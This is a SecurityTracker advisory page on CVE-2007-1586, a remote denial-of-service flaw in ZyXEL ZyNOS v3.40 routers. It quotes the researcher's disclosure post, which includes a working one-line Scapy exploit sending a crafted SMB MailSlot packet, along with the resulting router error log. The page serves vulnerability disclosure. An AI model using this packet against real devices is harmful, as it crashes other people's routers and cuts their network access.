SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Router/Bridge/Hub)  >   Prestige Router (ZyXEL) Vendors:   ZyXEL Communications Corp.
ZyXEL Router ZyNOS Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1017795
SecurityTracker URL:  http://securitytracker.com/id/1017795
CVE Reference:   CVE-2007-1586   (Links to External Site)
Updated:  Mar 22 2007
Original Entry Date:  Mar 20 2007
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 3.40
Description:   A vulnerability was reported in ZyXEL ZyNOS. A remote user can cause denial of service conditions.

A remote user can send specially crafted SMB data to cause the target ZyNOS operating system to crash.

Joxean Koret reported this vulnerability.

Impact:   A remote user can cause the target device to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.zyxel.com/ (Links to External Site)
Cause:   Exception handling error

Message History:   None.


 Source Message Contents

Subject:  ZynOS v3.40 One packet killer

Hi to all,

While playing in my home's network with Scapy I found
a vulnerability affecting the wireless services
offered by Zyxel routers with, at least, ZynOS v3.40.
That's the unique model I tested.

The exploit in question:

----------------------------------------------
""" ZynOS v3.40 One packet killer """
from scapy import sr, SMBMailSlot

sr(SMBMailSlot(name="\\M"))
----------------------------------------------

After launching it you will found in the router's
errlog a text like the following:

  34 Sat Jan 01 00:00:13 2000 PP15  WARN 
netMakeChannDial: err=-3001 rn_p=9483fbb0
  37 Sat Jan 01 00:00:18 2000 PP15  WARN 
netMakeChannDial: err=-3001 rn_p=9483fbb0
  40 Sat Jan 01 00:00:23 2000 PP15  WARN 
netMakeChannDial: err=-3001 rn_p=9483fbb0
  42 Sat Jan 01 00:00:28 2000 PP15  WARN 
netMakeChannDial: err=-3001 rn_p=9483fbb0
  45 Sat Jan 01 00:00:35 2000 PP15  WARN 
netMakeChannDial: err=-3001 rn_p=9483fbb0
  46 Sat Jan 01 00:00:37 2000 PP0b  WARN  MPOA Link
Down
  48 Sat Jan 01 00:00:40 2000 PP15  WARN 
netMakeChannDial: err=-3001 rn_p=9483fbb0
  51 Sat Jan 01 00:00:49 2000 PP15  WARN 
netMakeChannDial: err=-3001 rn_p=9483fbb0
  54 Sat Jan 01 00:00:54 2000 PP15  WARN 
netMakeChannDial: err=-3001 rn_p=9483fbb0
  57 Sat Jan 01 00:00:58 2000 PP0b  WARN  MPOA Link Up

The following is the complete version:

router> sys version
 ZyNOS version: V3.40(AHQ.0) | 05/01/2006
 romRasSize: 2321890
 system up time:     0:03:17 (4d3d ticks)
 bootbase version: V1.06 | 1/20/2006

Disclaimer
----------

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory. 




		
______________________________________________ 
LLama Gratis a cualquier PC del Mundo. 
http://es.voice.yahoo.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC